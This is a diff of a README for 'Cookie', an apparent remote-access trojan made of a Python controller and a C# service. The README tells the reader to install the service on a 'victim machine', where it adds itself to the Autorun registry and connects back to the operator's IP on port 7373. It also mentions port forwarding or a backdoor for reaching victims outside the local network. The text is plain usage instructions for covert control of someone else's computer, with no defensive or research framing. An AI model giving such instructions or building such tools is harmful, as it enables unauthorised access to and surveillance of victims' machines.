CailCode/cookie/README.md

 >Cookie_Client
 >>Cookie_Server

-- The Cookie Client is the scrpit Python, this is the script that you have to use for controlling the victim machine;
+- The Cookie Server is the scrpit Python, this is the script that you have to use for controlling the victim machine;

 You can use it on your mobile phone (use QPython) or in your computers.
-You have to set only the IP of the victim, it have to be in your LAN or you have to use __Cookie__ with a __Backdoor__.
-The default port i [7373]
+You have to set only the IP, the victim has to be in your LAN or you have to use a forward port.
+The default port is [7373]

-- The Cookie Server is the C# service; You have to change the IP and the default port:
+- The Cookie Client is the C# service; You have to change the IP and the default port to your ip:

 >cookie.Connect("127.0.0.1",7373);

 You must install it on victim machine and in some way (there are a lot of ways) start it, then it writes it self in the Autorun registry.
-Then you have just to connect with Cookie Client.
+Then it will search for Cookie Server.